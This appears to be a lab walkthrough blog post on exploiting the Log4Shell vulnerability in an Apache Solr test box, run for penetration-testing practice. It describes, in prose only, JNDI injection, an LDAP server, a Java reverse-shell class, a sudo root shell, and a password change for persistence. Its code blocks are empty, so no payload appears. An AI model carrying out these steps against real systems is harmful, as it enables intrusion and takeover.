With CVE-2021-44228 vulerability (Log4Shell) posing a major threat to Java applications hosted on the internet with a CVSS score of 10.0 critical designation. Remote code execution can be accomplished by taking advantage of a Java Naming and Directory Interface (JNDI) within Log4j logging packages. Solar provides a test scenairo for exploitation of vulnerability.
Legal Notice && Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk. By continuing, you acknowledge the aforementioned user risk/responsibilities.
Reconnaissance
Enumeration
Nmap scan:
1 |
|
futher enumerate port 8983
1 |
|
Discovery
Http Server
navigate to http://10.10.212.184:8983
Argument set for -Dsolr.log.dir
set to /var/solr/logs
Downloaded Task Files
within the solr.log
file we can discover and example of the solr log file that is normally generated.
Proof of Concept
navigate to http://10.10.212.184:8983/solr/admin/cores
log4j payload
1 |
|
Creating a test scenario
Adding a callback request from target to local attacking machine would allow a local listener to capture any incoming request
Listener setup on port 9999 locally and payload is sent via curl:
1 |
|
successful connection from target system to attacking system can be established by crafted injection to the ?foo
parameter.
setup local LDAP server
1 |
|
craft java reverse shell on attacking machine create an exploit.
1 |
|
compile java exploit code:
1 |
|
newly created Exploit.class
file that will be hosted locally and sent to target via the jndi payload.
send payload
1 |
|
Persistence
Establishing a foothold on box as solr
Check sudo sudo -l
called "/bin/bash"
with sudo for a root shell.
changing password of solr
for the ability to ssh into target.